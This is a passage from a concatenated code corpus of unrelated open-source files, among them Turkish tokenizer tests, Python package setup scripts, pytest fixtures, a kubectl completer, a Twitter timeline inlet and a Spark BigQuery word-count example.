["2.3.1987", "tarihinden", "beri", "burdayım", "."],
),
(
"Bu olay 2005-2006 tarihleri arasında oldu.",
["Bu", "olay", "2005", "-", "2006", "tarihleri", "arasında", "oldu", "."],
),
(
"Bu olay 4/12/2005-21/3/2006 tarihleri arasında oldu.",
[
"Bu",
"olay",
"4/12/2005",
"-",
"21/3/2006",
"tarihleri",
"arasında",
"oldu",
".",
],
),
(
"Ek fıkra: 5/11/2003-4999/3 maddesine göre uygundur.",
[
"Ek",
"fıkra",
":",
"5/11/2003",
"-",
"4999/3",
"maddesine",
"göre",
"uygundur",
".",
],
),
(
"2/A alanları: 6831 sayılı Kanunun 2nci maddesinin birinci fıkrasının (A) bendine göre",
[
"2/A",
"alanları",
":",
"6831",
"sayılı",
"Kanunun",
"2nci",
"maddesinin",
"birinci",
"fıkrasının",
"(",
"A",
")",
"bendine",
"göre",
],
),
(
"ŞEHİTTEĞMENKALMAZ Cad. No: 2/311",
["ŞEHİTTEĞMENKALMAZ", "Cad.", "No", ":", "2/311"],
),
(
"2-3-2025",
[
"2-3-2025",
],
),
("2/3/2025", ["2/3/2025"]),
("Yıllardır 0.5 uç kullanıyorum.", ["Yıllardır", "0.5", "uç", "kullanıyorum", "."]),
(
"Kan değerlerim 0.5-0.7 arasıydı.",
["Kan", "değerlerim", "0.5", "-", "0.7", "arasıydı", "."],
),
("0.5", ["0.5"]),
("1/2", ["1/2"]),
("%1", ["%", "1"]),
("%1lik", ["%", "1lik"]),
("%1'lik", ["%", "1'lik"]),
("%1lik dilim", ["%", "1lik", "dilim"]),
("%1'lik dilim", ["%", "1'lik", "dilim"]),
("%1.5", ["%", "1.5"]),
# ("%1-%2 arası büyüme bekleniyor.", ["%", "1", "-", "%", "2", "arası", "büyüme", "bekleniyor", "."]),
(
"%1-2 arası büyüme bekliyoruz.",
["%", "1", "-", "2", "arası", "büyüme", "bekliyoruz", "."],
),
(
"%11-12 arası büyüme bekliyoruz.",
["%", "11", "-", "12", "arası", "büyüme", "bekliyoruz", "."],
),
("%1.5luk büyüme bekliyoruz.", ["%", "1.5luk", "büyüme", "bekliyoruz", "."]),
(
"Saat 1-2 arası gelin lütfen.",
["Saat", "1", "-", "2", "arası", "gelin", "lütfen", "."],
),
("Saat 15:30 gibi buluşalım.", ["Saat", "15:30", "gibi", "buluşalım", "."]),
("Saat 15:30'da buluşalım.", ["Saat", "15:30'da", "buluşalım", "."]),
("Saat 15.30'da buluşalım.", ["Saat", "15.30'da", "buluşalım", "."]),
("Saat 15.30da buluşalım.", ["Saat", "15.30da", "buluşalım", "."]),
("Saat 15 civarı buluşalım.", ["Saat", "15", "civarı", "buluşalım", "."]),
("9’daki otobüse binsek mi?", ["9’daki", "otobüse", "binsek", "mi", "?"]),
("Okulumuz 3-B şubesi", ["Okulumuz", "3-B", "şubesi"]),
("Okulumuz 3/B şubesi", ["Okulumuz", "3/B", "şubesi"]),
("Okulumuz 3B şubesi", ["Okulumuz", "3B", "şubesi"]),
("Okulumuz 3b şubesi", ["Okulumuz", "3b", "şubesi"]),
(
"<NAME> 20. yüzyılda, 1904-1914 yılları arasında on yıl süren bir reform süreci getirmiştir.",
[
"Antonio",
"Gaudí",
"20.",
"yüzyılda",
",",
"1904",
"-",
"1914",
"yılları",
"arasında",
"on",
"yıl",
"süren",
"bir",
"reform",
"süreci",
"getirmiştir",
".",
],
),
(
"Dizel yakıtın avro bölgesi ortalaması olan 1,165 avroya kıyasla litre başına 1,335 avroya mal olduğunu gösteriyor.",
[
"Dizel",
"yakıtın",
"avro",
"bölgesi",
"ortalaması",
"olan",
"1,165",
"avroya",
"kıyasla",
"litre",
"başına",
"1,335",
"avroya",
"mal",
"olduğunu",
"gösteriyor",
".",
],
),
(
"<NAME>. 1 Ocak 49'da, Sezar'dan Vali'nin kendisini barış dostu ilan ettiği bir bildiri yayınlamıştır.",
[
"Marcus",
"Antonius",
"M.Ö.",
"1",
"Ocak",
"49'da",
",",
"Sezar'dan",
"Vali'nin",
"kendisini",
"barış",
"dostu",
"ilan",
"ettiği",
"bir",
"bildiri",
"yayınlamıştır",
".",
],
),
]
PUNCT_TESTS = [
("Gitmedim dedim ya!", ["Gitmedim", "dedim", "ya", "!"]),
("Gitmedim dedim ya!!", ["Gitmedim", "dedim", "ya", "!", "!"]),
("Gitsek mi?", ["Gitsek", "mi", "?"]),
("Gitsek mi??", ["Gitsek", "mi", "?", "?"]),
("Gitsek mi?!?", ["Gitsek", "mi", "?", "!", "?"]),
(
"Ankara - Antalya arası otobüs işliyor.",
["Ankara", "-", "Antalya", "arası", "otobüs", "işliyor", "."],
),
(
"Ankara-Antalya arası otobüs işliyor.",
["Ankara", "-", "Antalya", "arası", "otobüs", "işliyor", "."],
),
("Sen--ben, ya da onlar.", ["Sen", "--", "ben", ",", "ya", "da", "onlar", "."]),
(
"Senden, benden, bizden şarkısını biliyor musun?",
["Senden", ",", "benden", ",", "bizden", "şarkısını", "biliyor", "musun", "?"],
),
(
"Akif'le geldik, sonra da o ayrıldı.",
["Akif'le", "geldik", ",", "sonra", "da", "o", "ayrıldı", "."],
),
("Bu adam ne dedi şimdi???", ["Bu", "adam", "ne", "dedi", "şimdi", "?", "?", "?"]),
(
"Yok hasta olmuş, yok annesi hastaymış, bahaneler işte...",
[
"Yok",
"hasta",
"olmuş",
",",
"yok",
"annesi",
"hastaymış",
",",
"bahaneler",
"işte",
"...",
],
),
(
"Ankara'dan İstanbul'a ... bir aşk hikayesi.",
["Ankara'dan", "İstanbul'a", "...", "bir", "aşk", "hikayesi", "."],
),
("Ahmet'te", ["Ahmet'te"]),
("İstanbul'da", ["İstanbul'da"]),
]
GENERAL_TESTS = [
(
"1914'teki Endurance seferinde, Sir <NAME>'ın kaptanlığını yaptığı İngiliz Endurance gemisi yirmi sekiz kişi ile Antarktika'yı geçmek üzere yelken açtı.",
[
"1914'teki",
"Endurance",
"seferinde",
",",
"Sir",
"Ernest",
"Shackleton'ın",
"kaptanlığını",
"yaptığı",
"İngiliz",
"Endurance",
"gemisi",
"yirmi",
"sekiz",
"kişi",
"ile",
"Antarktika'yı",
"geçmek",
"üzere",
"yelken",
"açtı",
".",
],
),
(
'Danışılan "%100 Cospedal" olduğunu belirtti.',
["Danışılan", '"', "%", "100", "Cospedal", '"', "olduğunu", "belirtti", "."],
),
(
"1976'da parkur artık kullanılmıyordu; 1990'da ise bir yangın, daha sonraları ahırlarla birlikte yıkılacak olan tahta tribünlerden geri kalanları da yok etmişti.",
[
"1976'da",
"parkur",
"artık",
"kullanılmıyordu",
";",
"1990'da",
"ise",
"bir",
"yangın",
",",
"daha",
"sonraları",
"ahırlarla",
"birlikte",
"yıkılacak",
"olan",
"tahta",
"tribünlerden",
"geri",
"kalanları",
"da",
"yok",
"etmişti",
".",
],
),
(
"Dahiyane bir ameliyat ve zorlu bir rehabilitasyon sürecinden sonra, tamamen iyileştim.",
[
"Dahiyane",
"bir",
"ameliyat",
"ve",
"zorlu",
"bir",
"rehabilitasyon",
"sürecinden",
"sonra",
",",
"tamamen",
"iyileştim",
".",
],
),
(
"Yaklaşık iki hafta süren bireysel erken oy kullanma döneminin ardından 5,7 milyondan fazla Floridalı sandık başına gitti.",
[
"Yaklaşık",
"iki",
"hafta",
"süren",
"bireysel",
"erken",
"oy",
"kullanma",
"döneminin",
"ardından",
"5,7",
"milyondan",
"fazla",
"Floridalı",
"sandık",
"başına",
"gitti",
".",
],
),
(
"Ancak, bu ABD <NAME>ı'nın dünyayı bu konularda uyarmasının ardından ortaya çıktı.",
[
"Ancak",
",",
"bu",
"ABD",
"Çevre",
"Koruma",
"Ajansı'nın",
"dünyayı",
"bu",
"konularda",
"uyarmasının",
"ardından",
"ortaya",
"çıktı",
".",
],
),
(
"Ortalama şansa ve 10.000 Sterlin değerinde tahvillere sahip bir yatırımcı yılda 125 Sterlin ikramiye kazanabilir.",
[
"Ortalama",
"şansa",
"ve",
"10.000",
"Sterlin",
"değerinde",
"tahvillere",
"sahip",
"bir",
"yatırımcı",
"yılda",
"125",
"Sterlin",
"ikramiye",
"kazanabilir",
".",
],
),
(
"Granit adaları; Seyşeller ve Tioman ile Saint Helena gibi volkanik adaları kapsar.",
[
"Granit",
"adaları",
";",
"Seyşeller",
"ve",
"Tioman",
"ile",
"Saint",
"Helena",
"gibi",
"volkanik",
"adaları",
"kapsar",
".",
],
),
(
"Barış antlaşmasıyla İspanya, Amerika'ya Porto Riko, Guam ve Filipinler kolonilerini devretti.",
[
"Barış",
"antlaşmasıyla",
"İspanya",
",",
"Amerika'ya",
"Porto",
"Riko",
",",
"Guam",
"ve",
"Filipinler",
"kolonilerini",
"devretti",
".",
],
),
(
"Makedonya'nın sınır bölgelerini güvence altına alan Philip, büyük bir Makedon ordusu kurdu ve uzun bir fetih seferi için Trakya'ya doğru yürüdü.",
[
"Makedonya'nın",
"sınır",
"bölgelerini",
"güvence",
"altına",
"alan",
"Philip",
",",
"büyük",
"bir",
"Makedon",
"ordusu",
"kurdu",
"ve",
"uzun",
"bir",
"fetih",
"seferi",
"için",
"Trakya'ya",
"doğru",
"yürüdü",
".",
],
),
(
"Fransız gazetesi Le Figaro'ya göre bu hükumet planı sayesinde 42 milyon Euro kazanç sağlanabilir ve elde edilen paranın 15.5 milyonu ulusal güvenlik için kullanılabilir.",
[
"Fransız",
"gazetesi",
"Le",
"Figaro'ya",
"göre",
"bu",
"hükumet",
"planı",
"sayesinde",
"42",
"milyon",
"Euro",
"kazanç",
"sağlanabilir",
"ve",
"elde",
"edilen",
"paranın",
"15.5",
"milyonu",
"ulusal",
"güvenlik",
"için",
"kullanılabilir",
".",
],
),
(
"Ortalama şansa ve 10.000 Sterlin değerinde tahvillere sahip bir yatırımcı yılda 125 Sterlin ikramiye kazanabilir.",
[
"Ortalama",
"şansa",
"ve",
"10.000",
"Sterlin",
"değerinde",
"tahvillere",
"sahip",
"bir",
"yatırımcı",
"yılda",
"125",
"Sterlin",
"ikramiye",
"kazanabilir",
".",
],
),
(
"3 K<NAME> günü, <NAME> Başkanı 2014'te hükümetle birlikte oluşturulan kentsel gelişim anlaşmasını askıya alma kararı verdi.",
[
"3",
"Kasım",
"Salı",
"günü",
",",
"Ankara",
"Belediye",
"Başkanı",
"2014'te",
"hükümetle",
"birlikte",
"oluşturulan",
"kentsel",
"gelişim",
"anlaşmasını",
"askıya",
"alma",
"kararı",
"verdi",
".",
],
),
(
"Stalin, Abakumov'u Beria'nın enerji bakanlıkları üzerindeki baskınlığına karşı MGB içinde kendi ağını kurmaya teşvik etmeye başlamıştı.",
[
"Stalin",
",",
"Abakumov'u",
"Beria'nın",
"enerji",
"bakanlıkları",
"üzerindeki",
"baskınlığına",
"karşı",
"MGB",
"içinde",
"kendi",
"ağını",
"kurmaya",
"teşvik",
"etmeye",
"başlamıştı",
".",
],
),
(
"<NAME>'daki kazı alanlarının çoğunluğu gibi, bu bulgu M.Ö. 5. yüzyılın başlar",
[
"Güney",
"Avrupa'daki",
"kazı",
"alanlarının",
"çoğunluğu",
"gibi",
",",
"bu",
"bulgu",
"M.Ö.",
"5.",
"yüzyılın",
"başlar",
],
),
(
"Sağlığın bozulması Hitchcock hayatının son yirmi yılında üretimini azalttı.",
[
"Sağlığın",
"bozulması",
"Hitchcock",
"hayatının",
"son",
"yirmi",
"yılında",
"üretimini",
"azalttı",
".",
],
),
]
TESTS = ABBREV_TESTS + URL_TESTS + NUMBER_TESTS + PUNCT_TESTS + GENERAL_TESTS
@pytest.mark.parametrize("text,expected_tokens", TESTS)
def test_tr_tokenizer_handles_allcases(tr_tokenizer, text, expected_tokens):
tokens = tr_tokenizer(text)
token_list = [token.text for token in tokens if not token.is_space]
print(token_list)
assert expected_tokens == token_list
|
fusepy/setup.py | ffroehling/fuse_module_driver_framework | 229 | 11156452 | #!/usr/bin/env python
from __future__ import with_statement
from setuptools import setup
with open('README') as readme:
documentation = readme.read()
setup(
name = 'fusepy',
version = '3.0.1',
description = 'Simple ctypes bindings for FUSE',
long_description = documentation,
author = '<NAME>',
author_email = '<EMAIL>',
maintainer = '<NAME>',
maintainer_email = '<EMAIL>',
license = 'ISC',
py_modules=['fuse'],
url = 'http://github.com/fusepy/fusepy',
classifiers = [
'Intended Audience :: Developers',
'License :: OSI Approved :: ISC License (ISCL)',
'Operating System :: MacOS',
'Operating System :: POSIX',
'Operating System :: Unix',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 3',
'Topic :: System :: Filesystems',
]
)
|
py_entitymatching/explorer/pandastable/pandastable_wrapper.py | kvpradap/py_entitymatching | 165 | 11156473 | <filename>py_entitymatching/explorer/pandastable/pandastable_wrapper.py
try:
from tkinter import *
except ImportError as e:
from Tkinter import *
from py_entitymatching.utils.validation_helper import validate_object_type
import pandas as pd
def data_explore_pandastable(df):
"""
Wrapper function for pandastable. Gives user a GUI to examine and edit
the dataframe passed in using pandastable.
Args:
df (Dataframe): The pandas dataframe to be explored with pandastable.
Raises:
AssertionError: If `df` is not of type pandas DataFrame.
Examples:
>>> import py_entitymatching as em
>>> A = em.read_csv_metadata('path_to_csv_dir/table.csv', key='ID')
>>> em.data_explore_pandastable(A)
"""
# Validate input parameters
# # We expect the df to be of type pandas DataFrame
validate_object_type(df, pd.DataFrame, 'Input df')
DataExplorePandastable(df)
class DataExplorePandastable(Frame):
"""
A wrapper for pandastable.
"""
def __init__(self, df):
# Import
try:
from pandastable import Table, TableModel
except ImportError:
raise ImportError('Pandastable is not installed. Please install pandastable to use '
'pandastable data exploration functions.')
self.parent = None
Frame.__init__(self)
self.main = self.master
self.main.geometry('600x400+200+100')
self.main.title('Explore Data')
f = Frame(self.main)
f.pack(fill=BOTH, expand=1)
# set the table in the GUI
self.table = pt = Table(f, dataframe=df,
showtoolbar=True, showstatusbar=True)
pt.show()
self.mainloop()
|
rotkehlchen/tests/fixtures/greenlets.py | coblee/rotki | 137 | 11156476 | import pytest
from rotkehlchen.greenlets import GreenletManager
@pytest.fixture(scope='session')
def greenlet_manager(messages_aggregator):
return GreenletManager(msg_aggregator=messages_aggregator)
@pytest.fixture
def function_greenlet_manager(function_scope_messages_aggregator):
return GreenletManager(msg_aggregator=function_scope_messages_aggregator)
|
test/apps/_graphql/_fastapi/__init__.py | stannum-l/schemathesis | 563 | 11156491 | from fastapi import FastAPI
from strawberry.fastapi import GraphQLRouter
from ..schema import schema
def create_app(path="/graphql"):
app = FastAPI()
graphql_app = GraphQLRouter(schema)
app.include_router(graphql_app, prefix=path)
return app
|
accountauth/models.py | FuentesFelipe/asvs | 128 | 11156500 | <gh_stars>100-1000
from django.db import models
# Create your models here.
from django.contrib.auth.models import AbstractUser
class CustomUser(AbstractUser):
is_superuser = models.BooleanField()
is_two_factor_enabled = models.BooleanField()
secret= models.CharField(max_length=400)
|
import.py | ChienNguyenVP/kma_ctf | 501 | 11156520 | """
python import.py export.zip
"""
from CTFd import create_app
from CTFd.utils.exports import import_ctf
import sys
app = create_app()
with app.app_context():
import_ctf(sys.argv[1])
|
inter/LiftTicketInit.py | middleprince/12306 | 33,601 | 11156535 | <gh_stars>1000+
# coding=utf-8
import re
class liftTicketInit:
def __init__(self, session):
self.session = session
def reqLiftTicketInit(self):
"""
        Request the ticket-grabbing initialization page.
:return:
"""
urls = self.session.urls["left_ticket_init"]
        # Fetch the initialization result
result = self.session.httpClint.send(urls)
        # Use a regular expression to extract the value of CLeftTicketUrl
matchObj = re.search('var CLeftTicketUrl = \'(.*)\'', result, re.M|re.I);
if matchObj:
            # If a value was found, replace queryUrl
self.session.queryUrl = matchObj.group(1)
return {
"status": True
}
|
src/misc/listening_test.py | entn-at/blow | 147 | 11156549 | <reponame>entn-at/blow
import sys,argparse,os,subprocess
import numpy as np
# Arguments
parser=argparse.ArgumentParser(description='Audio listening script')
parser.add_argument('--path_refs_train',default='',type=str,required=True,help='(default=%(default)s)')
parser.add_argument('--path_refs_test',default='',type=str,required=True,help='(default=%(default)s)')
parser.add_argument('--paths_convs',default='',type=str,required=True,help='(default=%(default)s)')
parser.add_argument('--player',default='',type=str,required=True,help='(default=%(default)s)')
parser.add_argument('--extension',default='.wav',type=str,required=False,help='(default=%(default)s)')
parser.add_argument('--delimiters',default='_to_,-vcto-',type=str,required=False,help='(default=%(default)s)')
parser.add_argument('--force_file',default='',type=str,required=False,help='(default=%(default)s)')
args=parser.parse_args()
args.paths_convs=args.paths_convs.split(',')
args.delimiters=args.delimiters.split(',')
if args.force_file=='':
args.force_file=None
########################################################################################################################
print('='*100)
print('Load references...')
# Load train refs
fn_refs_train=[]
for dirpath,dirnames,filenames in os.walk(args.path_refs_train):
for fn in filenames:
if fn.endswith(args.extension):
fn_refs_train.append(os.path.join(dirpath,fn))
print(args.path_refs_train,':',len(fn_refs_train),'references (train)')
# Load test refs
fn_refs_test=[]
for dirpath,dirnames,filenames in os.walk(args.path_refs_test):
for fn in filenames:
if fn.endswith(args.extension):
fn_refs_test.append(os.path.join(dirpath,fn))
print(args.path_refs_test,':',len(fn_refs_test),'references (test)')
# Load conversions
print('Load conversions...')
fn_conv={}
convmin=np.inf
pathmin=None
for path in args.paths_convs:
fn_conv[path]=[]
for dirpath,dirnames,filenames in os.walk(path):
for fn in filenames:
if fn.endswith(args.extension):
if args.force_file is None or args.force_file in fn:
fn_out=os.path.join(dirpath,fn)
spk=None
for sep in args.delimiters:
if sep in fn:
fn,spk=fn.split(sep)
break
if spk is None:
continue
spk_ref=spk[:-len(args.extension)]
fn_in=os.path.join(args.path_refs_test,fn+args.extension)
fn_conv[path].append([fn_in,spk_ref,fn_out])
print(path,':',len(fn_conv[path]),'conversions')
if len(fn_conv[path])<convmin:
convmin=len(fn_conv[path])
pathmin=path
print('='*100)
########################################################################################################################
# Play
print('Running test...')
answers=[]
exit=False
np.random.shuffle(fn_conv[pathmin])
n=0
for fn_in,spk_ref,fn_out in fn_conv[pathmin]:
print('-'*100)
np.random.shuffle(fn_refs_train)
for fn in fn_refs_train:
if spk_ref+'_' in fn:
fn_ref=fn
break
print('R:',fn_ref,'-->',fn_in)
tests={}
for path in fn_conv.keys():
for new_fn_in,new_spk_ref,new_fn_out in fn_conv[path]:
if new_fn_in==fn_in and new_spk_ref==spk_ref:
tests[path]=new_fn_out
break
order=list(tests.keys())
np.random.shuffle(order)
nvotes=0
while True:
key=input('Q{:d}: [s/t/1-{:d}/v1-v{:d}/q/n] '.format(n+1,len(tests),len(tests))).lower()
if key=='q':
exit=True
break
elif key=='n':
break
elif key=='s':
subprocess.call([args.player,fn_in],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL)
elif key=='t':
subprocess.call([args.player,fn_ref],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL)
elif key.isdigit():
num=int(key)-1
subprocess.call([args.player,tests[order[num]]],stdout=subprocess.DEVNULL,stderr=subprocess.DEVNULL)
elif key[0]=='v':
nvotes+=1
print('Voted for system '+key[1]+'! ({:d} votes)'.format(nvotes))
num=int(key[1])-1
answers.append(order[num])
else:
continue
n+=1
if exit:
break
########################################################################################################################
print('='*100)
print('Vote count:')
count={}
for path in fn_conv.keys():
count[path]=0
for ans in answers:
count[ans]+=1
for path in count.keys():
print(path,'\t',count[path])
print('='*100)
|
kubeshell/completer.py | manusajith/kube-shell | 2,143 | 11156582 | <filename>kubeshell/completer.py<gh_stars>1000+
from __future__ import absolute_import, unicode_literals, print_function
from subprocess import check_output
from prompt_toolkit.completion import Completer, Completion
from fuzzyfinder import fuzzyfinder
import logging
import shlex
import json
import os
import os.path
from kubeshell.parser import Parser
from kubeshell.client import KubernetesClient
logger = logging.getLogger(__name__)
class KubectlCompleter(Completer):
def __init__(self):
self.inline_help = True
self.namespace = ""
self.kube_client = KubernetesClient()
try:
DATA_DIR = os.path.dirname(os.path.realpath(__file__))
DATA_PATH = os.path.join(DATA_DIR, 'data/cli.json')
with open(DATA_PATH) as json_file:
self.kubectl_dict = json.load(json_file)
self.parser = Parser(DATA_PATH)
except Exception as ex:
logger.error("got an exception" + ex.message)
def set_inline_help(self, val):
self.inline_help = val
def set_namespace(self, namespace):
self.namespace = namespace
def get_completions(self, document, complete_event, smart_completion=None):
word_before_cursor = document.get_word_before_cursor(WORD=True)
cmdline = document.text_before_cursor.strip()
try:
tokens = shlex.split(cmdline)
_, _, suggestions = self.parser.parse_tokens(tokens)
valid_keys = fuzzyfinder(word_before_cursor, suggestions.keys())
for key in valid_keys:
yield Completion(key, -len(word_before_cursor), display=key, display_meta=suggestions[key])
except ValueError:
pass
|
homeassistant/components/tailscale/coordinator.py | MrDelik/core | 30,023 | 11156583 | """DataUpdateCoordinator for the Tailscale integration."""
from __future__ import annotations
from tailscale import Device, Tailscale, TailscaleAuthenticationError
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import ConfigEntryAuthFailed
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from .const import CONF_TAILNET, DOMAIN, LOGGER, SCAN_INTERVAL
class TailscaleDataUpdateCoordinator(DataUpdateCoordinator[dict[str, Device]]):
"""The Tailscale Data Update Coordinator."""
config_entry: ConfigEntry
def __init__(self, hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Initialize the Tailscale coordinator."""
self.config_entry = entry
session = async_get_clientsession(hass)
self.tailscale = Tailscale(
session=session,
api_key=entry.data[CONF_API_KEY],
tailnet=entry.data[CONF_TAILNET],
)
super().__init__(hass, LOGGER, name=DOMAIN, update_interval=SCAN_INTERVAL)
async def _async_update_data(self) -> dict[str, Device]:
"""Fetch devices from Tailscale."""
try:
return await self.tailscale.devices()
except TailscaleAuthenticationError as err:
raise ConfigEntryAuthFailed from err
|
tests/test_reader.py | Vimos/img2dataset | 482 | 11156603 | <reponame>Vimos/img2dataset<filename>tests/test_reader.py
from img2dataset.reader import Reader
import os
from fixtures import generate_input_file, setup_fixtures
import pytest
import math
import time
import gc
import psutil
import shutil
import pandas as pd
def current_memory_usage():
return psutil.Process().memory_info().rss / 1024 / 1024
@pytest.mark.parametrize(
"input_format", ["txt", "csv", "tsv", "tsv.gz", "json", "parquet",],
)
def test_reader(input_format, tmp_path):
"""Tests whether Reader class works as expected."""
expected_count = 10 ** 5 + 5312
test_folder = str(tmp_path)
test_list = setup_fixtures(count=expected_count)
prefix = input_format + "_"
url_list_name = os.path.join(test_folder, prefix + "url_list")
url_list_name = generate_input_file(input_format, url_list_name, test_list)
tmp_path = os.path.join(test_folder, prefix + "tmp")
os.mkdir(tmp_path)
start_shard_id = 37
batch_size = 10000
reader = Reader(
url_list=url_list_name,
input_format=input_format,
url_col="url",
caption_col=None if input_format == "txt" else "caption",
save_additional_columns=None,
number_sample_per_shard=batch_size,
start_shard_id=start_shard_id,
tmp_path=test_folder,
)
if input_format == "txt":
assert reader.column_list == ["url"]
else:
assert reader.column_list == ["caption", "url"]
last_shard_num = math.ceil(expected_count / batch_size) - 1
total_sample_count = 0
start_time = time.time()
initial_memory_usage = current_memory_usage()
for incremental_shard_id, (shard_id, shard_path) in enumerate(reader):
assert incremental_shard_id + start_shard_id == shard_id
shard_df = pd.read_feather(shard_path)
shard = list(enumerate(shard_df[reader.column_list].to_records(index=False).tolist()))
total_sample_count += len(shard)
if last_shard_num == incremental_shard_id:
assert len(shard) <= batch_size
else:
assert len(shard) == batch_size
begin_expected = incremental_shard_id * batch_size
end_expected = (incremental_shard_id + 1) * batch_size
expected_shard = list(enumerate(test_list[begin_expected:end_expected]))
if input_format == "txt":
expected_shard = [(i, (url,)) for i, (_, url) in expected_shard]
assert shard == expected_shard
current_usage = current_memory_usage()
assert current_usage - initial_memory_usage < 100
del expected_shard
del shard
del reader
assert total_sample_count == expected_count
total_time = time.time() - start_time
print("Total time:", total_time)
assert total_time <= 1.0
gc.collect()
final_memory_usage = current_memory_usage()
assert final_memory_usage - initial_memory_usage < 100
|
examples/analog_in.py | Jcc99/Adafruit_Blinka | 294 | 11156615 | """Analog in demo"""
import time
import board
from analogio import AnalogIn
analog_in = AnalogIn(board.A1)
def get_voltage(pin):
return (pin.value * 3.3) / 4096
while True:
print((get_voltage(analog_in),))
time.sleep(0.1)
|
corehq/apps/smsbillables/management/commands/bootstrap_yo_gateway.py | dimagilg/commcare-hq | 471 | 11156646 | <reponame>dimagilg/commcare-hq<gh_stars>100-1000
from decimal import Decimal
from django.core.management.base import BaseCommand
from corehq.apps.accounting.models import Currency
from corehq.apps.sms.models import INCOMING, OUTGOING
from corehq.apps.smsbillables.models import (
SmsGatewayFee,
SmsGatewayFeeCriteria,
)
from corehq.apps.smsbillables.utils import log_smsbillables_info
from corehq.messaging.smsbackends.yo.models import SQLYoBackend
def bootstrap_yo_gateway(apps):
ugx, _ = (apps.get_model('accounting', 'Currency') if apps else Currency).objects.get_or_create(code='UGX')
sms_gateway_fee_class = apps.get_model('smsbillables', 'SmsGatewayFee') if apps else SmsGatewayFee
sms_gateway_fee_criteria_class = apps.get_model('smsbillables', 'SmsGatewayFeeCriteria') if apps else SmsGatewayFeeCriteria
SmsGatewayFee.create_new(
SQLYoBackend.get_api_id(),
INCOMING,
Decimal('110.0'),
currency=ugx,
fee_class=sms_gateway_fee_class,
criteria_class=sms_gateway_fee_criteria_class,
)
SmsGatewayFee.create_new(
SQLYoBackend.get_api_id(),
OUTGOING,
Decimal('55.0'),
currency=ugx,
fee_class=sms_gateway_fee_class,
criteria_class=sms_gateway_fee_criteria_class,
)
log_smsbillables_info("Updated Yo gateway fees.")
class Command(BaseCommand):
help = "bootstrap Yo global SMS backend gateway fees"
def handle(self, **options):
bootstrap_yo_gateway(None)
|
examples/twitter_inlet.py | Voyz/databay | 175 | 11156647 | import os
import tweepy
from databay import Inlet, Link
from databay.outlets import PrintOutlet
from databay.planners import SchedulePlanner
class TwitterInlet(Inlet):
"""
An implementation of an `Inlet` that uses the Tweepy (https://www.tweepy.org/)
    Twitter client to pull tweets from either a specific user's timeline or the
home timeline belonging to an authenticated `tweepy.API` instance.
"""
def __init__(self, api: tweepy.API, user: str = None, most_recent_id=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.api = api
self.user = user
# this will ensure we only every pull tweets that haven't been handled
self.most_recent_id = most_recent_id
# sets flag indicating whether we are pulling from as single user
# or from the home timeline.
if self.user is None:
self.is_user_timeline = False
else:
self.is_user_timeline = True
def pull(self, update):
if self.is_user_timeline:
if self.most_recent_id is not None:
public_tweets = self.api.user_timeline(
self.user, since_id=self.most_recent_id)
else:
public_tweets = self.api.user_timeline(
self.user)
else:
if self.most_recent_id is not None:
public_tweets = self.api.home_timeline(
since_id=self.most_recent_id)
else:
public_tweets = self.api.home_timeline()
if len(public_tweets) > 0:
# 0th tweet is most recent
self.most_recent_id = public_tweets[0].id
tweets = []
for tweet in public_tweets:
tweets.append({"user": tweet.user.screen_name, "text": tweet.text})
return tweets
# gets twitter api secrets and keys from environment vars
consumer_key = os.getenv("twitter_key")
consumer_secret = os.getenv("twitter_secret")
access_token = os.getenv("twitter_access_token")
access_token_secret = os.getenv("twitter_access_token_secret")
auth = tweepy.OAuthHandler(
consumer_key, consumer_secret) # user defined values
auth.set_access_token(access_token, access_token_secret) # user defined values
# extra params here protect against twitter rate limiting
# set link intervals with this in mind
# for more on twitter rate limiting see https://developer.twitter.com/en/docs/rate-limits
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
# create TwitterUserInlet() pointed at a specific account name
twitter_user_inlet = TwitterInlet(api, "@BarackObama")
link = Link(twitter_user_inlet, PrintOutlet(only_payload=True),
interval=30, tags='twitter_timeline')
planner = SchedulePlanner(link)
planner.start()
|
examples/python/shakespeare.py | thekuwayama/spark-bigquery-connector | 135 | 11156659 | #!/usr/bin/env python
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import tempfile
from pyspark.sql import SparkSession
spark = SparkSession.builder.appName('Shakespeare WordCount').getOrCreate()
table = 'bigquery-public-data.samples.shakespeare'
df = spark.read.format('bigquery').load(table)
# Only these columns will be read
df = df.select('word', 'word_count')
# The filters that are allowed will be automatically pushed down.
# Those that are not will be computed client side
df = df.where("word_count > 0 AND word NOT LIKE '%\\'%'")
# Further processing is done inside Spark
df = df.groupBy('word').sum('word_count')
df = df.orderBy(df['sum(word_count)'].desc()).cache()
print('The resulting schema is')
df.printSchema()
print('The top words in shakespeare are')
df.show()
# Use tempfile just to get random directory name. Spark will create the
# directory in the default file system anyways.
path = tempfile.mkdtemp(prefix='spark-bigquery')
print('Writing table out to {}'.format(path))
df.write.csv(path)
|
stonesoup/movable/tests/test_movable.py | Red-Portal/Stone-Soup-1 | 157 | 11156663 | from datetime import datetime, timedelta
import pytest
import numpy as np
from stonesoup.models.transition.linear import ConstantVelocity, ConstantTurn, \
CombinedLinearGaussianTransitionModel
from stonesoup.movable import MovingMovable, FixedMovable, MultiTransitionMovable
from stonesoup.types.array import StateVector
from stonesoup.types.state import State
def test_fixed_movable_velocity_mapping_error():
# test no error for MovingMovable
_ = MovingMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_model=None,
)
with pytest.raises(ValueError, match='Velocity mapping should not be set for a FixedMovable'):
